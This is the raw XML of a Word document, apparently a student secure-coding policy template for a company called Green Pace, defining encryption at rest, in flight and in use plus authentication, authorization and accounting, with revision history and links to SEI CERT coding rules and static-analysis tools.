            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">1</w:t>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E5">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E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E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E8">
      <w:pPr>
        <w:ind w:left="1440" w:firstLine="0"/>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EA">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EB">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="5"/>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EC">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D">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3EE">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Encryption in rest is used to encrypt data that is being stored, either on a hard disk/solid state drive, or in cloud storage.  Under this model, all data being stored and not regularly accessed is encrypted so that only those with the encryption key(s) can utilize the data.  If a bad actor gains access to the data, they are unable to use it.  This policy is essential as it protects data that might otherwise be neglected.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F">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3F0">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Encryption at flight is used to encrypt data that is being transmitted from one location to another.  During this process, the data is encrypted on the sender’s side, and then sent in packets to the receiving party (who has the encryption key(s) necessary to decrypt the data).  This protects the data in cases where it might be intercepted during transit.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1">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F2">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Encryption in use is used to encrypt data that is regularly being accessed or used.  This form of encryption can be utilized in order to protect data from physical threats, such as unauthorized personnel trying to gain access to data on a system.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000003F3">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F4">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="5"/>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F5">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6">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F7">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">This strategy is used to make sure only certain individuals have access to data or systems, and is typically implemented via a username/password prompt on the system or program being run.  This strategy should occur prior to the user accessing the system/program.</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8">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F9">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">This strategy ensures that, once a system/program is accessed, certain tasks can only be run by a predefined set of individuals, and is used to define the current user’s level of access.  If the current user does not meet the requirements, the system/program should prohibit them from running these tasks.  This can be used to prevent or allow users to make system-wide changes, changes to databases, as well as add or remove other users.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A">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FB">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">This strategy is used to monitor a user’s activity and usage while in the system/program.  This is used to analyze the user’s usage, and to ensure that resources are being utilized as intended.  This can also be used to track what files or subsystems the user is accessing.</w:t>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04">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05">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06">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0D">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410">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Evidence will include the following:</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1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19">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41A">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41F">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2A">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42B">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42E">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431">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32">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33">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34">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35">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36">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37">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">1.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000438">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">08/05/2020</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000439">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Initial Template</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000043A">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">David Buksbaum</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000043B">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3C">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">1.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000043D">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">04/09/2023</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000043E">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Completed Policy</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000043F">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Aaron Campbell</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000440">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">[Insert text.]</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>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445">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46">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47">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48">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">C++</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000449">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4A">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">C</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000044B">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4C">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Java</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000044D">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">JAV</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000044E">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:sectPr>
      <w:headerReference r:id="rId61" w:type="default"/>
      <w:footerReference r:id="rId6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1">
    <w:pPr>
      <w:jc w:val="center"/>
      <w:rPr/>
    </w:pPr>
    <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
      <w:rPr/>
      <w:drawing>
        <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
          <wp:extent cx="395288" cy="510580"/>
          <wp:effectExtent b="0" l="0" r="0" t="0"/>
          <wp:docPr descr="Green Pace logo" id="14" name="image1.png"/>
          <a:graphic>
            <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
              <pic:pic>
                <pic:nvPicPr>
                  <pic:cNvPr descr="Green Pace logo" id="0" name="image1.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iki.sei.cmu.edu/confluence/pages/viewpage.action?pageId=222953724" TargetMode="External"/><Relationship Id="rId42" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://wiki.sei.cmu.edu/confluence/display/cplusplus/LDRA" TargetMode="External"/><Relationship Id="rId41" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://wiki.sei.cmu.edu/confluence/display/c/CodeSonar" TargetMode="External"/><Relationship Id="rId44" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://wiki.sei.cmu.edu/confluence/display/c/DCL04-C.+Do+not+declare+more+than+one+variable+per+declaration" TargetMode="External"/><Relationship Id="rId43"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ECLAIR" TargetMode="External"/><Relationship Id="rId45" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://wiki.sei.cmu.edu/confluence/display/c/CodeSon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DCL07-C.+Include+the+appropriate+type+information+in+function+declarators" TargetMode="External"/><Relationship Id="rId48" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://wiki.sei.cmu.edu/confluence/display/c/Parasoft" TargetMode="External"/><Relationship Id="rId47" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://wiki.sei.cmu.edu/confluence/display/c/LDRA" TargetMode="External"/><Relationship Id="rId49" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://wiki.sei.cmu.edu/confluence/display/c/INT08-C.+Verify+that+all+integer+values+are+in+ran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linkedin.com/pulse/understanding-hierarchy-principles-policies-standards-wally-beddoe/" TargetMode="External"/><Relationship Id="rId31"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plusplus/Clang" TargetMode="External"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://wiki.sei.cmu.edu/confluence/display/c/Parasoft" TargetMode="External"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://wiki.sei.cmu.edu/confluence/display/c/Coverity" TargetMode="External"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://wiki.sei.cmu.edu/confluence/display/cplusplus/Clang" TargetMode="External"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://wiki.sei.cmu.edu/confluence/display/c/DCL03-C.+Use+a+static+assertion+to+test+the+value+of+a+constant+expression" TargetMode="External"/><Relationship Id="rId37" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://wiki.sei.cmu.edu/confluence/display/c/ECLAIR" TargetMode="External"/><Relationship Id="rId3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ERR51-CPP.+Handle+all+exceptions" TargetMode="External"/><Relationship Id="rId38" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://wiki.sei.cmu.edu/confluence/display/c/LDRA" TargetMode="External"/><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hyperlink" Target="https://wiki.sei.cmu.edu/confluence/display/c/LDRA" TargetMode="External"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://wiki.sei.cmu.edu/confluence/display/c/Polyspace+Bug+Finder" TargetMode="External"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://wiki.sei.cmu.edu/confluence/display/c/Parasoft" TargetMode="External"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://wiki.sei.cmu.edu/confluence/display/c/STR02-C.+Sanitize+data+passed+to+complex+subsystems" TargetMode="External"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://wiki.sei.cmu.edu/confluence/display/cplusplus/RuleChecker" TargetMode="External"/><Relationship Id="rId60" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image4.png"/><Relationship Id="rId26" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://wiki.sei.cmu.edu/confluence/display/c/Coverity" TargetMode="External"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://wiki.sei.cmu.edu/confluence/display/c/CodeSonar" TargetMode="External"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://wiki.sei.cmu.edu/confluence/display/c/Polyspace+Bug+Finder" TargetMode="External"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://wiki.sei.cmu.edu/confluence/display/c/LDRA" TargetMode="External"/><Relationship Id="rId29" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://wiki.sei.cmu.edu/confluence/display/cplusplus/MEM50-CPP.+Do+not+access+freed+memory" TargetMode="External"/><Relationship Id="rId51" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://wiki.sei.cmu.edu/confluence/display/c/CodeSonar" TargetMode="External"/><Relationship Id="rId50" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://wiki.sei.cmu.edu/confluence/pages/viewpage.action?pageId=222953724" TargetMode="External"/><Relationship Id="rId53" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://wiki.sei.cmu.edu/confluence/display/c/Parasoft" TargetMode="External"/><Relationship Id="rId52" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://wiki.sei.cmu.edu/confluence/display/c/LDRA" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://wiki.sei.cmu.edu/confluence/display/c/CodeSonar" TargetMode="External"/><Relationship Id="rId55" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://wiki.sei.cmu.edu/confluence/display/c/Axivion+Bauhaus+Suite" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://wiki.sei.cmu.edu/confluence/pages/viewpage.action?pageId=87152428" TargetMode="External"/><Relationship Id="rId54" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://wiki.sei.cmu.edu/confluence/display/c/ARR02-C.+Explicitly+specify+array+bounds%2C+even+if+implicitly+defined+by+an+initializer" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://wiki.sei.cmu.edu/confluence/display/c/Polyspace+Bug+Finder" TargetMode="External"/><Relationship Id="rId57" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://wiki.sei.cmu.edu/confluence/display/c/PC-lint+Plus" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://wiki.sei.cmu.edu/confluence/display/c/ECLAIR" TargetMode="External"/><Relationship Id="rId56" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://wiki.sei.cmu.edu/confluence/display/c/ECLAIR" TargetMode="External"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://wiki.sei.cmu.edu/confluence/display/c/LDRA" TargetMode="External"/><Relationship Id="rId59" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image3.png"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://wiki.sei.cmu.edu/confluence/display/c/DCL00-C.+Const-qualify+immutable+objects" TargetMode="External"/><Relationship Id="rId58" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://wiki.sei.cmu.edu/confluence/display/c/PRQA+QA-C" TargetMode="External"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://wiki.sei.cmu.edu/confluence/display/c/PC-lint+Plus" TargetMode="External"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://wiki.sei.cmu.edu/confluence/display/c/Parasoft" TargetMode="External"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://wiki.sei.cmu.edu/confluence/display/cplusplus/STR50-CPP.+Guarantee+that+storage+for+strings+has+sufficient+space+for+character+data+and+the+null+terminator" TargetMode="External"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://wiki.sei.cmu.edu/confluence/display/c/PRQA+Q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NwIIR+hGf+r/7NIDNjp1r2FLMA==">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